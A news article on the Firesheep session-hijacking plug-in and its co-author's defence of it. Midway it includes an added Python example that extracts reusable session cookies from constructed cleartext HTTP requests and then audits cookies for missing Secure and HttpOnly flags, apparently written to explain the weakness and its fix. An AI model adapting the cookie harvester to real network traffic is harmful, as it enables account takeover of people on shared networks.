One of a pair of developers who created FireSheep, a Firefox browser plug-in that makes it easy to snoop on others’ social networking sessions, has written a blog post defending his creation, saying it has helped elevate discussion about security on the Web.
In a post on his blog, Eric Butler, a co-author of FireSheep with Ian Gallagher of Security Innovation, responded to charges that his creation was malicious and to criticisms that the plug-in for the Mozilla browser opens up session hijacking even to unskilled Web users.
“Like any tool, Firesheep can be used for many things. In addition to raising awareness, it has already proven very useful for people who want to test their own security as well as the security of their (consenting) friends,” Butler wrote.
FireSheep allows Firefox users who are connected to unsecured wireless networks to canvass and then snoop on social networking sessions on sites including Facebook, iGoogle and Flickr, by capturing the session cookies those sites send in the clear and presenting each logged-in user as a one-click target. The program was unveiled at the ToorCon Security Conference in San Diego in October.
Rather than questioning the legal right of FireSheep to exist, people should question the motives and behavior of those who use it to illegally access others’ accounts, he wrote.
The program was created to raise awareness about the insecurity of social networking Web sites, many of which do not require – or even offer – an encrypted channel for interacting with their Web-based applications. Many of these sites encrypt only the login page and then send the resulting session cookie over plain HTTP on every later request, so a listener does not need the password at all: the cookie alone is enough to impersonate the user. Sessions carried over plain HTTP can easily be captured and monitored on unencrypted wireless LANs. Security experts have long warned about eavesdropping and session hijacking attacks that take advantage of that gaping security hole, and tools – such as Wireshark – have long enabled technical users to do what FireSheep does.
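To make the weakness concrete, here is an added example (not Firesheep’s code, and not from the author) that replays the two halves of the problem: a passive sniffer that pulls reusable session cookies out of cleartext HTTP requests using per-site handlers, as Firesheep does, and the server-side cookie check that defeats it. The host names, cookie names and captured requests are all constructed for the example.

```python
"""Passive session-cookie capture over cleartext HTTP, and the Set-Cookie
check that defeats it.  Added example, not Firesheep's code; the hosts,
cookie names and captured requests below are constructed."""
import re
from dataclasses import dataclass

# Which cookie names carry the login session for each site.  Firesheep ships
# one handler per site for this purpose; these hosts and names are hypothetical.
SITE_HANDLERS = {
    "www.social.example": {"c_user", "xs"},
    "photos.example": {"cookie_session"},
}

# Constructed cleartext requests as a sniffer on an open WLAN would see them.
CAPTURED_REQUESTS = [
    b"GET /home HTTP/1.1\r\nHost: www.social.example\r\n"
    b"Cookie: datr=abc123; c_user=1000123; xs=12%3Adeadbeef\r\n\r\n",
    b"GET /photos/ HTTP/1.1\r\nHost: photos.example\r\n"
    b"Cookie: cookie_session=s3ss10n-t0k3n; lang=en\r\n\r\n",
    b"GET /news HTTP/1.1\r\nHost: news.example\r\nCookie: pref=dark\r\n\r\n",
    b"\x16\x03\x01\x02\x00\x01\x00\x01\xfc\x03\x03",  # TLS ClientHello: opaque
]

_REQUEST_LINE = re.compile(r"^(GET|POST|HEAD|PUT|DELETE) \S+ HTTP/1\.[01]$")


@dataclass(frozen=True)
class HijackedSession:
    host: str
    cookies: tuple  # ((name, value), ...) ready to load into another browser


def parse_cookie_header(value: str) -> dict:
    """Split 'a=1; b=2' into {'a': '1', 'b': '2'}; values are left encoded."""
    cookies = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep and name:
            cookies[name] = val
    return cookies


def parse_http_request(raw: bytes):
    """Return (host, cookies) for a cleartext HTTP request, else None."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    try:
        lines = head.decode("ascii").split("\r\n")
    except UnicodeDecodeError:
        return None  # binary payload (e.g. TLS): nothing readable here
    if not _REQUEST_LINE.match(lines[0]):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, val = line.partition(":")
        if sep:
            headers[name.strip().lower()] = val.strip()
    if "host" not in headers:
        return None
    return headers["host"], parse_cookie_header(headers.get("cookie", ""))


def harvest_sessions(packets):
    """What Firesheep-style sniffing yields: one reusable session per login seen.
    Only hosts with a handler count, and only when every session cookie is there."""
    found = []
    for raw in packets:
        parsed = parse_http_request(raw)
        if parsed is None:
            continue
        host, cookies = parsed
        wanted = SITE_HANDLERS.get(host)
        if wanted and wanted.issubset(cookies):
            pairs = tuple((n, cookies[n]) for n in sorted(wanted))
            found.append(HijackedSession(host, pairs))
    return found


# --- the fix: the session cookie must never leave the browser over plain HTTP ---

def _attributes(set_cookie: str) -> set:
    """Lower-cased attribute names of a Set-Cookie header (Path, Secure, ...)."""
    return {p.strip().split("=", 1)[0].lower() for p in set_cookie.split(";")[1:]}


def cookie_sent_over(set_cookie: str, scheme: str) -> bool:
    """Would a browser attach this cookie to a request on `scheme`?  Without
    the Secure attribute it goes out on http:// links too, where it is sniffable."""
    return scheme == "https" or "secure" not in _attributes(set_cookie)


def audit_set_cookie(set_cookie: str) -> list:
    """Findings a site must fix before an HTTPS-only login page protects anything."""
    attrs = _attributes(set_cookie)
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: cookie is sent in clear on http:// requests")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: cookie readable by page script")
    return findings


if __name__ == "__main__":
    for s in harvest_sessions(CAPTURED_REQUESTS):
        print("hijackable:", s.host, dict(s.cookies))
    weak = "xs=12%3Adeadbeef; Path=/; Domain=.social.example"
    print(audit_set_cookie(weak))
    print(audit_set_cookie(weak + "; Secure; HttpOnly"))
```

Run as-is it reports two hijackable sessions from the four captured packets (the third host has no handler, and the TLS record is unreadable), and the audit shows why: the constructed site sets its session cookie without Secure, so the browser hands it to any plain-HTTP link on the same domain. Marking the cookie Secure is what stops the sniffer; serving the whole site over HTTPS is what makes that flag usable.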
The difference, of course, is that FireSheep allows Web surfers to hijack these sessions without any technical expertise. The Mozilla Foundation, which makes the Firefox browser, declined to block the plug-in, noting that it merely points to a weakness in social networking sites and does not exploit a vulnerability in Firefox or other browsers. Microsoft, however, added a signature for the tool to its anti-malware engine, classifying FireSheep as a hacking tool – a move that Butler likens to censorship of users who would like to try his creation.
Ultimately, Butler, who describes himself as a freelance Web application developer living in Seattle, said that the brouhaha should not be about FireSheep, but about the lax security that large corporations continue to tolerate in the applications and services they offer online.
“Big companies, especially Facebook and Twitter cannot claim they are unaware of these issues. They have knowingly placed user privacy on the back burner, and I’d be interested to hear some discussion about the ethics of these decisions, which have left users at risk since long before Firesheep.”
And the discussion goes on!